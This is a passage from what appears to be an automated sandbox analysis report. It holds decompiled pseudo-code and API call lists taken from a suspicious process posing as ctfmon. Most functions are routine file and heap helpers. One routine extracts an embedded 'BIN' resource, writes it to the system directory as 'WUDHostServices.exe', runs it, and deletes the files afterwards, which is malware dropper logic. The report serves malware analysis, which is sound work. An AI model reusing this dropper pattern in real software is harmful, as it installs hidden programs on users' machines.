                                                							_v12 = 0xffff;
                                                							if(_t84 < 0xffff) {
                                                								L8:
                                                								_v12 = _t84;
                                                							}
                                                						}
                                                					}
                                                					_push(0x404);
                                                					_t48 = E00975A3B(_t68);
                                                					_t91 = _t48;
                                                					_t96 = _t95 + 4;
                                                					if(_t91 != 0) {
                                                						_t69 = _v12;
                                                						_t49 = 4;
                                                						_v8 = 0xffffffff;
                                                						if(_t69 > 4) {
                                                							while(1) {
                                                								_t78 =  >  ? _t69 : _t49 + 0x400;
                                                								_t54 = _t84 - _t78;
                                                								_v32 = _t78;
                                                								_v28 = _t54;
                                                								_t87 =  >  ? 0x404 : _t84 - _t54;
                                                								_t55 = E0096E170(_t67, _t54, 0); // executed
                                                								_t96 = _t96 + 4;
                                                								if(_t55 != 0) {
                                                									goto L31;
                                                								}
                                                								_t72 = _t87;
                                                								_v20 = _t87;
                                                								if( *_t67 == _t55) {
                                                									_t80 =  *((intOrPtr*)(_t67 + 0x1c));
                                                									if(_t80 + _t87 >  *((intOrPtr*)(_t67 + 0x18))) {
                                                										_t72 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
                                                										_v20 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
                                                									}
                                                									E00983DB0(_t91,  *((intOrPtr*)(_t67 + 0x14)) + _t80, _t72);
                                                									_t58 = _v20;
                                                									_t96 = _t96 + 0xc;
                                                									 *((intOrPtr*)(_t67 + 0x1c)) =  *((intOrPtr*)(_t67 + 0x1c)) + _t58;
                                                								} else {
                                                									_t63 = ReadFile( *(_t67 + 4), _t91, _t87,  &_v24, _t55); // executed
                                                									if(_t63 == 0) {
                                                										 *((char*)(_t67 + 8)) = 1;
                                                									}
                                                									_t58 = _v24;
                                                								}
                                                								if(_t58 / _t87 == 1) {
                                                									_t60 = _t87 - 3;
                                                									if(_t60 < 0) {
                                                										L28:
                                                										_t61 = _v8;
                                                									} else {
                                                										while(1) {
                                                											_t60 = _t60 - 1;
                                                											if( *((char*)(_t60 + _t91)) == 0x50 &&  *((char*)(_t60 + _t91 + 1)) == 0x4b &&  *((char*)(_t60 + _t91 + 2)) == 5 &&  *((char*)(_t60 + _t91 + 3)) == 6) {
                                                												break;
                                                											}
                                                											if(_t60 >= 0) {
                                                												continue;
                                                											} else {
                                                												goto L28;
                                                											}
                                                											goto L29;
                                                										}
                                                										_t61 = _t60 + _v28;
                                                										_v8 = _t61;
                                                									}
                                                									L29:
                                                									if(_t61 == 0) {
                                                										_t69 = _v12;
                                                										_t49 = _v32;
                                                										_t84 = _v16;
                                                										if(_t49 < _t69) {
                                                											continue;
                                                										}
                                                									}
                                                								}
                                                								goto L31;
                                                							}
                                                						}
                                                						L31:
                                                						L00975A36(_t91);
                                                						return _v8;
                                                					} else {
                                                						return _t48 | 0xffffffff;
                                                					}
                                                				} else {
                                                					return _t46 | 0xffffffff;
                                                				}
                                                			}































                                                APIs
                                                  • Part of subcall function 0096E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E190
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E3F6
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 854cca4e0e6f4d366369c8f1d84792a8d21e388965e4c9a9ce443370be58468f
                                                • Instruction ID: 7e0a8d216596da5d02635a592b0826be00a6d88478cf3eb99d6a47e403c60764
                                                • Opcode Fuzzy Hash: 854cca4e0e6f4d366369c8f1d84792a8d21e388965e4c9a9ce443370be58468f
                                                • Instruction Fuzzy Hash: 504115B4F042059FEF24CF78D88477E7BA99F81314F1481B9E90ADB292EA30DD418B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00977848(void* _a4) {
                                                				char _t3;
                                                				intOrPtr* _t4;
                                                				intOrPtr _t6;
                                                
                                                				if(_a4 != 0) {
                                                					_t3 = RtlFreeHeap( *0x9967f4, 0, _a4); // executed
                                                					if(_t3 == 0) {
                                                						_t4 = E00975D43();
                                                						_t6 = E00975CCA(GetLastError());
                                                						 *_t4 = _t6;
                                                						return _t6;
                                                					}
                                                				}
                                                				return _t3;
                                                			}







                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,0097C333,?,00000000,?,00000000,?,0097C35A,?,00000007,?,?,0097C757,?), ref: 0097785E
                                                • GetLastError.KERNEL32(?,?,0097C333,?,00000000,?,00000000,?,0097C35A,?,00000007,?,?,0097C757,?,?), ref: 00977870
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: 70f2c6b37cd6806ec393b8b1e21863664fd3f5de3b9e5c5c601a7d4205cb6d9c
                                                • Instruction ID: 500c169c202eafe3719d0bc9cf539cc9d7c76734ac6aff5f9086ffad442043be
                                                • Opcode Fuzzy Hash: 70f2c6b37cd6806ec393b8b1e21863664fd3f5de3b9e5c5c601a7d4205cb6d9c
                                                • Instruction Fuzzy Hash: B3E0C233018B04ABCB252FE8EC0DB997BDCEF40354F158034FA4C9A261DAB49880E7C8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E009648B0(intOrPtr* __ecx) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t18;
                                                				intOrPtr* _t19;
                                                
                                                				_t19 = __ecx;
                                                				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
                                                				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50); // executed
                                                				_t20 =  *_t19;
                                                				_t18 = _t8;
                                                				asm("movups xmm0, [esi]");
                                                				_t2 = _t18 + 0x50; // 0x50
                                                				asm("movups [edi], xmm0");
                                                				asm("movups xmm0, [esi+0x10]");
                                                				asm("movups [edi+0x10], xmm0");
                                                				asm("movups xmm0, [esi+0x20]");
                                                				asm("movups [edi+0x20], xmm0");
                                                				asm("movups xmm0, [esi+0x30]");
                                                				asm("movups [edi+0x30], xmm0");
                                                				asm("movups xmm0, [esi+0x40]");
                                                				asm("movups [edi+0x40], xmm0");
                                                				E00983DB0(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
                                                				_t11 = E00964920(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
                                                				LocalFree(_t18); // executed
                                                				return _t11;
                                                			}








                                                APIs
                                                • LocalAlloc.KERNELBASE(00000040,?,?,00000000,-00000050,00964BCD), ref: 009648C0
                                                  • Part of subcall function 00964920: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 00964935
                                                • LocalFree.KERNELBASE(00000000), ref: 00964912
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: ffeae2b735a774d263e91dd3e43b4183f2aec506a6ffad2c04c8ec60d4dc7ff3
                                                • Instruction ID: bc29fafdcdbe1647efc630914ae64523ee5791dba07e8abef59e9278458e4507
                                                • Opcode Fuzzy Hash: ffeae2b735a774d263e91dd3e43b4183f2aec506a6ffad2c04c8ec60d4dc7ff3
                                                • Instruction Fuzzy Hash: ED019231D14F45ABD3118F38CD41AB2F3B4FFAD318705A709EAC522912E761B5E49750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0096E280(char* __ecx, long __edx) {
                                                				void _v5;
                                                				long _v12;
                                                				signed int _t22;
                                                				signed int* _t28;
                                                				intOrPtr _t29;
                                                				intOrPtr _t31;
                                                				char* _t35;
                                                
                                                				_t35 = __ecx;
                                                				_t28 = __edx;
                                                				_v12 = __edx;
                                                				_t33 = 1;
                                                				if( *__ecx == 0) {
                                                					_t29 =  *((intOrPtr*)(__ecx + 0x1c));
                                                					_t31 =  *((intOrPtr*)(__ecx + 0x18));
                                                					if(_t29 + 1 > _t31) {
                                                						_t33 = _t31 - _t29;
                                                					}
                                                					E00983DB0( &_v5,  *((intOrPtr*)(_t35 + 0x14)) + _t29, _t33);
                                                					_t22 = _t29 + _t33;
                                                					_t28 = _v12;
                                                					 *(_t35 + 0x1c) = _t22;
                                                				} else {
                                                					_t22 = ReadFile( *(__ecx + 4),  &_v5, 1,  &_v12, 0); // executed
                                                					if(_t22 == 0) {
                                                						 *((char*)(_t35 + 8)) = 1;
                                                					}
                                                					_t33 = _v12;
                                                				}
                                                				if(_t33 != 1) {
                                                					if( *_t35 == 0 ||  *((char*)(_t35 + 8)) == 0) {
                                                						goto L9;
                                                					} else {
                                                						return _t22 | 0xffffffff;
                                                					}
                                                				} else {
                                                					 *_t28 = _v5 & 0x000000ff;
                                                					L9:
                                                					return 0;
                                                				}
                                                			}











                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0096E59A,00000001), ref: 0096E2A8
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f4c88f9c63e02d4ecca992a78c9ecb281668231e3e99f89c4896102375a15950
                                                • Instruction ID: a2a9e000ea258f4bba6b0319a17ce728c6ff07f27d1fa21c4d914fe829cca493
                                                • Opcode Fuzzy Hash: f4c88f9c63e02d4ecca992a78c9ecb281668231e3e99f89c4896102375a15950
                                                • Instruction Fuzzy Hash: DF11EB79A042086FDB30CF99D8C4BA9BBFDEB85314F1405AED895C7281D671ED48C760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E0096F3D0(intOrPtr* __ecx, void* __edi, CHAR* _a4) {
                                                				char _v8;
                                                				char _t13;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				intOrPtr _t17;
                                                				intOrPtr _t20;
                                                				short _t21;
                                                				CHAR* _t23;
                                                				char* _t29;
                                                				CHAR* _t32;
                                                				short* _t34;
                                                				intOrPtr* _t36;
                                                
                                                				_push(__ecx);
                                                				_t36 = __ecx;
                                                				if( *__ecx != 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                					return 0x1000000;
                                                				} else {
                                                					_t2 = _t36 + 0x140; // 0x140
                                                					_t32 = _t2;
                                                					GetCurrentDirectoryA(0x104, _t32);
                                                					_t23 = _t32;
                                                					_t3 =  &(_t23[1]); // 0x141
                                                					_t29 = _t3;
                                                					do {
                                                						_t13 =  *_t23;
                                                						_t23 =  &(_t23[1]);
                                                					} while (_t13 != 0);
                                                					_t24 = _t23 - _t29;
                                                					_t14 =  *((intOrPtr*)(_t23 - _t29 + _t36 + 0x13f));
                                                					if(_t14 != 0x5c && _t14 != 0x2f) {
                                                						_t34 = _t32 - 1;
                                                						do {
                                                							_t20 =  *((intOrPtr*)(_t34 + 1));
                                                							_t34 = _t34 + 1;
                                                						} while (_t20 != 0);
                                                						_t21 = "\\"; // 0x5c
                                                						 *_t34 = _t21;
                                                					}
                                                					_t16 = E0096E0D0(_a4, _t24,  &_v8); // executed
                                                					if(_t16 != 0) {
                                                						_t17 = E0096E550(_t16); // executed
                                                						 *_t36 = _t17;
                                                						_t28 =  ==  ? 0x200 : 0;
                                                						_t18 =  ==  ? 0x200 : 0;
                                                						return  ==  ? 0x200 : 0;
                                                					} else {
                                                						return _v8;
                                                					}
                                                				}
                                                			}
















                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0096FFE1,?,?,00000244,35554C2F,?,?,?,35554C2F,009847B2), ref: 0096F3F7
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 4797bee67188648cda783eb7184714df6d2ad8c8b01b1dff129d9cbe5e9ba135
                                                • Instruction ID: 7ff38ed9a6baa83b541b76041b8b2d560c70dc6fdcd1f9a8285f93544b20c71a
                                                • Opcode Fuzzy Hash: 4797bee67188648cda783eb7184714df6d2ad8c8b01b1dff129d9cbe5e9ba135
                                                • Instruction Fuzzy Hash: 71113D361042059BCB248F2CB815BF6B799DF89314F00437EE89987A51EB325D578790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E0096E200(void* __ecx, signed int __edx, long _a4, char* _a8) {
                                                				void* _v8;
                                                				int _t26;
                                                				signed int _t30;
                                                				intOrPtr _t34;
                                                				intOrPtr _t39;
                                                				char* _t45;
                                                				long _t50;
                                                
                                                				_push(__ecx);
                                                				_t45 = _a8;
                                                				_t30 = __edx;
                                                				_t50 = __edx * _a4;
                                                				_v8 = __ecx;
                                                				if( *_t45 == 0) {
                                                					_t39 =  *((intOrPtr*)(_t45 + 0x1c));
                                                					_t34 =  *((intOrPtr*)(_t45 + 0x18));
                                                					if(_t39 + _t50 > _t34) {
                                                						_t50 = _t34 - _t39;
                                                					}
                                                					E00983DB0(_v8,  *((intOrPtr*)(_t45 + 0x14)) + _t39, _t50);
                                                					 *((intOrPtr*)(_t45 + 0x1c)) =  *((intOrPtr*)(_t45 + 0x1c)) + _t50;
                                                					return _t50 / _t30;
                                                				} else {
                                                					_t26 = ReadFile( *(_t45 + 4), __ecx, _t50,  &_a4, 0); // executed
                                                					if(_t26 == 0) {
                                                						 *((char*)(_t45 + 8)) = 1;
                                                					}
                                                					return _a4 / _t30;
                                                				}
                                                			}











                                                APIs
                                                • ReadFile.KERNELBASE(000000FF,00000078,?,?,00000000,00000000,00000000,00000000,00000078,?,0096EC00,00000001,00000000), ref: 0096E227
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 03c02a71c80ea9bd677d81d57e93326f793ace6b4235d628875d96bed000b52a
                                                • Instruction ID: 9a2501da467ec71c74fb4018121b4ddee9289f6456c66c19f294038da491b2b8
                                                • Opcode Fuzzy Hash: 03c02a71c80ea9bd677d81d57e93326f793ace6b4235d628875d96bed000b52a
                                                • Instruction Fuzzy Hash: 9F01C475B000197FD718CE1ADC85AA6FB6DFF88324F04826AE80C87200E771AD64CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E009778D0(void* __ecx, signed int _a4, signed int _a8) {
                                                				void* _t8;
                                                				void* _t12;
                                                				signed int _t13;
                                                				void* _t15;
                                                				signed int _t18;
                                                				long _t19;
                                                
                                                				_t15 = __ecx;
                                                				_t18 = _a4;
                                                				if(_t18 == 0) {
                                                					L2:
                                                					_t19 = _t18 * _a8;
                                                					if(_t19 == 0) {
                                                						_t19 = _t19 + 1;
                                                					}
                                                					while(1) {
                                                						_t8 = RtlAllocateHeap( *0x9967f4, 8, _t19); // executed
                                                						if(_t8 != 0) {
                                                							break;
                                                						}
                                                						__eflags = E00977501();
                                                						if(__eflags == 0) {
                                                							L8:
                                                							 *((intOrPtr*)(E00975D43())) = 0xc;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						_t12 = E00976248(_t15, __eflags, _t19);
                                                						_pop(_t15);
                                                						__eflags = _t12;
                                                						if(_t12 == 0) {
                                                							goto L8;
                                                						}
                                                					}
                                                					return _t8;
                                                				}
                                                				_t13 = 0xffffffe0;
                                                				if(_t13 / _t18 < _a8) {
                                                					goto L8;
                                                				}
                                                				goto L2;
                                                			}










                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009791AD,00000001,00000364,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 00977911
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 70fa8f1da509dad9e6c10ddd2cc36616177805cc0c13607d57f09baabad4063b
                                                • Instruction ID: c7de5845d772363ec74bc1b2da38cf7a41088b73850da18abad7d372f83f12aa
                                                • Opcode Fuzzy Hash: 70fa8f1da509dad9e6c10ddd2cc36616177805cc0c13607d57f09baabad4063b
                                                • Instruction Fuzzy Hash: 45F0E93361E62967DB221BE6CC05F5AF74CEF81770B15C821BD0CD6191DA60DD10D6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00977882(void* __ecx, long _a4) {
                                                				void* _t4;
                                                				void* _t6;
                                                				void* _t7;
                                                				long _t8;
                                                
                                                				_t7 = __ecx;
                                                				_t8 = _a4;
                                                				if(_t8 > 0xffffffe0) {
                                                					L7:
                                                					 *((intOrPtr*)(E00975D43())) = 0xc;
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				if(_t8 == 0) {
                                                					_t8 = _t8 + 1;
                                                				}
                                                				while(1) {
                                                					_t4 = RtlAllocateHeap( *0x9967f4, 0, _t8); // executed
                                                					if(_t4 != 0) {
                                                						break;
                                                					}
                                                					__eflags = E00977501();
                                                					if(__eflags == 0) {
                                                						goto L7;
                                                					}
                                                					_t6 = E00976248(_t7, __eflags, _t8);
                                                					_pop(_t7);
                                                					__eflags = _t6;
                                                					if(_t6 == 0) {
                                                						goto L7;
                                                					}
                                                				}
                                                				return _t4;
                                                			}








                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,00970A9A,77109EB0,?,00969C60,00000100,?,77109EB0), ref: 009778B4
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 75b820537c52b14bafb73759609dd39934703d0fa5a0f9d97e24928586b36b9a
                                                • Instruction ID: d364ff423e4dc294e360d18653bf04bc2742b117f80f8ce45c67dff446bbe811
                                                • Opcode Fuzzy Hash: 75b820537c52b14bafb73759609dd39934703d0fa5a0f9d97e24928586b36b9a
                                                • Instruction Fuzzy Hash: CFE06D3314C62566D62137E9DC49BDABB4CDB823E0F268161AC1DA6291DB64DC00C2E7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E0096E550(char* __ecx) {
                                                				intOrPtr _v8;
                                                				char _v96;
                                                				char _v100;
                                                				intOrPtr _v104;
                                                				intOrPtr _v120;
                                                				intOrPtr _v124;
                                                				intOrPtr _v128;
                                                				void _v132;
                                                				long _v136;
                                                				void* _v140;
                                                				signed int _v144;
                                                				signed int _v148;
                                                				signed int _v152;
                                                				long _t58;
                                                				void* _t59;
                                                				char _t61;
                                                				char _t62;
                                                				char _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				char _t70;
                                                				intOrPtr _t76;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				intOrPtr _t90;
                                                				signed int _t92;
                                                				intOrPtr _t93;
                                                				void* _t94;
                                                				signed int _t101;
                                                				char _t112;
                                                				intOrPtr _t136;
                                                				void _t146;
                                                				char _t157;
                                                				void* _t158;
                                                				intOrPtr _t160;
                                                
                                                				_push(_t87);
                                                				_t146 = __ecx;
                                                				_t170 = __ecx;
                                                				if(__ecx == 0) {
                                                					L31:
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					_t58 = E0096E3C0(__ecx, _t170); // executed
                                                					_t89 = _t87 | 0xffffffff;
                                                					_v136 = _t58;
                                                					_t155 =  ==  ? _t89 : 0; // executed
                                                					_t59 = E0096E170(__ecx, _t58, 0); // executed
                                                					_t156 =  !=  ? _t89 :  ==  ? _t89 : 0; // executed
                                                					E0096E320(__ecx,  &_v140, _t59); // executed
                                                					_t157 =  !=  ? _t89 :  !=  ? _t89 :  ==  ? _t89 : 0;
                                                					_t61 = E0096E280(__ecx,  &_v152);
                                                					_v144 = _v152;
                                                					if(_t61 != 0) {
                                                						L4:
                                                						__eflags = _t61;
                                                						_v144 = 0;
                                                						_t157 =  !=  ? _t89 : _t157;
                                                						__eflags = _t157;
                                                					} else {
                                                						_t61 = E0096E280(__ecx,  &_v152);
                                                						if(_t61 != 0) {
                                                							goto L4;
                                                						} else {
                                                							_t101 = _v152 << 8;
                                                							_v144 = _v144 + _t101;
                                                							_t89 = _t101 | 0xffffffff;
                                                						}
                                                					}
                                                					_t62 = E0096E280(_t146,  &_v152);
                                                					_v148 = _v152;
                                                					if(_t62 != 0) {
                                                						L8:
                                                						__eflags = _t62;
                                                						_v148 = 0;
                                                						_t157 =  !=  ? _t89 : _t157;
                                                						__eflags = _t157;
                                                					} else {
                                                						_t62 = E0096E280(_t146,  &_v152);
                                                						if(_t62 != 0) {
                                                							goto L8;
                                                						} else {
                                                							_v148 = _v148 + (_v152 << 8);
                                                						}
                                                					}
                                                					_t63 = E0096E280(_t146,  &_v152);
                                                					_v140 = _v152;
                                                					if(_t63 != 0) {
                                                						L12:
                                                						_t90 = 0;
                                                						__eflags = _t63;
                                                						_t157 =  !=  ? 0xffffffff : _t157;
                                                					} else {
                                                						_t63 = E0096E280(_t146,  &_v152);
                                                						if(_t63 != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t90 = (_v152 << 8) + _v140;
                                                						}
                                                					}
                                                					_v128 = _t90;
                                                					_t112 = E0096E280(_t146,  &_v152);
                                                					_v140 = _v152;
                                                					if(_t112 != 0) {
                                                						L16:
                                                						_t67 = 0;
                                                						__eflags = _t112;
                                                						_t158 =  !=  ? 0xffffffff : _t157;
                                                					} else {
                                                						_t112 = E0096E280(_t146,  &_v152);
                                                						if(_t112 != 0) {
                                                							goto L16;
                                                						} else {
                                                							_t67 = (_v152 << 8) + _v140;
                                                						}
                                                					}
                                                					if(_t67 != _t90 || _v148 != 0) {
                                                						L20:
                                                						_t158 = 0xffffff99;
                                                					} else {
                                                						_t184 = _v144;
                                                						if(_v144 != 0) {
                                                							goto L20;
                                                						}
                                                					}
                                                					_t68 = E0096E320(_t146,  &_v100, _t184);
                                                					_t159 =  !=  ? 0xffffffff : _t158;
                                                					E0096E320(_t146,  &_v96, _t68);
                                                					_t160 =  !=  ? 0xffffffff :  !=  ? 0xffffffff : _t158;
                                                					_t70 = E0096E280(_t146,  &_v152);
                                                					_t92 = _v152;
                                                					if(_t70 != 0) {
                                                						L24:
                                                						__eflags = _t70;
                                                						_v124 = 0;
                                                						_t160 =  !=  ? 0xffffffff : _t160;
                                                					} else {
                                                						_t70 = E0096E280(_t146,  &_v152);
                                                						if(_t70 != 0) {
                                                							goto L24;
                                                						} else {
                                                							_v124 = (_v152 << 8) + _t92;
                                                						}
                                                					}
                                                					_t136 =  *((intOrPtr*)(_t146 + 0xc));
                                                					_t118 = _v136 + _t136;
                                                					_t93 = _v100;
                                                					if(_v136 + _t136 < _v96 + _t93 || _t160 != 0) {
                                                						__eflags =  *((char*)(_t146 + 0x10));
                                                						if( *((char*)(_t146 + 0x10)) != 0) {
                                                							CloseHandle( *(_t146 + 4));
                                                						}
                                                						_push(0x20);
                                                						E00970AA1(_t146);
                                                						goto L31;
                                                					} else {
                                                						_t76 = _v136;
                                                						_v132 = _t146;
                                                						_push(0x80);
                                                						_v120 = _t136 - _t93 - _v96 + _t76;
                                                						_v104 = _t76;
                                                						_v8 = _t160;
                                                						 *((intOrPtr*)(_t146 + 0xc)) = _t160;
                                                						_t94 = E00975A3B(_t118);
                                                						memcpy(_t94,  &_v132, 0x20 << 2);
                                                						E0096EC60(_t94);
                                                						return _t94;
                                                					}
                                                				}
                                                			}







































                                                APIs
                                                  • Part of subcall function 0096E170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,0096E3D2,00000002,00000001,?,?,?,0096E570,?,00000000,00000001), ref: 0096E190
                                                  • Part of subcall function 0096E280: ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,0096E59A,00000001), ref: 0096E2A8
                                                • CloseHandle.KERNEL32(?), ref: 0096E799
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.705573501.0000000000960000.00000040.00000400.00020000.00000000.sdmp, Offset: 00960000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_960000_ctfmon.jbxd
                                                Similarity
                                                • API ID: File$CloseHandlePointerRead
                                                • String ID:
                                                • API String ID: 3130900363-0
                                                • Opcode ID: 84ad4ebc5f96a6d913115a4515a44eeb8209ab98c4e8258d5ca282e812de39f6
                                                • Instruction ID: be64c13af0e2f186b0af54aed64f1dd0034d676df8f0cdfbac5fab48cb5dc5bd
                                                • Opcode Fuzzy Hash: 84ad4ebc5f96a6d913115a4515a44eeb8209ab98c4e8258d5ca282e812de39f6
                                                • Instruction Fuzzy Hash: 76613B797093019FD715DE28C89072FB3E6AFD4364F048E2DE86987281FB74DD098A82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E00969740(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				intOrPtr _v792;
                                                				intOrPtr _v796;
                                                				void* __esi;
                                                				signed int _t22;
                                                				void* _t51;
                                                				struct HRSRC__* _t57;
                                                				void* _t70;
                                                				long _t71;
                                                				void** _t72;
                                                				signed int _t73;
                                                
                                                				_t68 = __edi;
                                                				_t58 = __ecx;
                                                				_t22 =  *0x98f008; // 0x35554c2f
                                                				_v8 = _t22 ^ _t73;
                                                				_v792 = __edx;
                                                				_v796 = __ecx;
                                                				E00973440(__edi,  &_v788, 0, 0x104);
                                                				E00973440(_t68,  &_v528, 0, 0x104);
                                                				E00973440(_t68,  &_v268, 0, 0x104);
                                                				GetSystemDirectoryA( &_v788, 0x104);
                                                				E00963F90(_t58,  &_v528, "%s\\mkz.output",  &_v788);
                                                				E00963F90(_t58,  &_v268, "%s\\WUDHostServices.exe",  &_v788);
                                                				DeleteFileA( &_v528);
                                                				DeleteFileA( &_v268);
                                                				_t57 = FindResourceA(0, 0x65, "BIN");
                                                				if(_t57 == 0) {
                                                					L7:
                                                					DeleteFileA( &_v268);
                                                					DeleteFileA( &_v528);
                                                					return E00970A5D(_v8 ^ _t73, _t70);
                                                				}
                                                				_push(_t70);
                                                				_t71 = SizeofResource(0, _t57);
                                                				if(LockResource(LoadResource(0, _t57)) != 0 && _t71 != 0) {
                                                					_t51 = E00964E00( &_v268, _t50, _t71);
                                                					_t83 = _t51;
                                                					if(_t51 != 0) {
                                                						_t72 = E00964F50( &_v268, 0, _t83, 0);
                                                						if(_t72 != 0) {
                                                							WaitForSingleObject( *_t72, 0x7530);
                                                							_push(0x10);
                                                							E00970AA1(_t72);
                                                							E009694A0(_t57,  &_v528, _v796, DeleteFileA, _v792);
                                                						}
                                                					}
                                                				}
                                                				_pop(_t70);
                                                				goto L7;
                                                			}


















                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 009697A9
                                                • DeleteFileA.KERNEL32(?), ref: 009697EF
                                                • DeleteFileA.KERNEL32(?), ref: 009697F8
                                                • FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 00969803
                                                • SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 00969817
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00969822
                                                • LockResource.KERNEL32(00000000), ref: 00969829
                                                  • Part of subcall function 00964E00: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,73BCF7E0,00000000,?,?,00969845), ref: 00964E22
                                                  • Part of subcall function 00964E00: WriteFile.KERNEL32(00000000,00000000,00969845,00000000,00000000,?,00969845), ref: 00964E39
                                                  • Part of subcall function 00964E00: CloseHandle.KERNEL32(00000000,?,00969845), ref: 00964E44
                                                  • Part of subcall function 00964F50: new.LIBCMT ref: 00964F6C
